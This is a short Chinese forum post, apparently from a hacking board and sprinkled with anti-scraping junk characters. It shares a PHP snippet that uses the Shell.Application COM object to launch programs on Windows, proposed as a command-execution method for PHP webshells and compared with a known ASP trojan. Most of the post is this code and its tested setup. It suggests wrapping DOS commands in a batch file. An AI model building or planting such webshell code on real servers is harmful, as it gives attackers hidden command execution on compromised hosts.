关于用Shell.Application来执行程序,在海阳顶端asp木马里已有示例。用的是ShellExecute 这个方法。) V5 U- g" B/ h( m4 f! ~0 w
4 w+ z6 _2 m$ s* F! N; w
今天试了一下,用open也可以。php代码如下,我好像还没有在php的webshell中看到相关方法+ }% @, T. \4 e# ]6 _
U1 w! ]( p; V4 h. @' j
<?php
8 h+ D( o9 q1 \9 l, }; I$wsh = new COM('Shell.Application') or die("Shell.Application");
" {9 `% V7 C- O# X# \ $exec = $wsh->open("c:\\windows\\system32\\notepad.exe");
& b; V. J( X8 D" n //没有回显,多了个notepad进程,可以写一个批处理来运行dos命令。open换用ShellExecute 也可。/ `: U1 c: v C
?>- ^: q# M7 w# M. q; j. [7 f- {
9 `. C8 I3 H& m: J+ [. y
xp+APMServ5.2.0测试通过。
4 f1 u: v7 k6 u K' h7 L7 ` |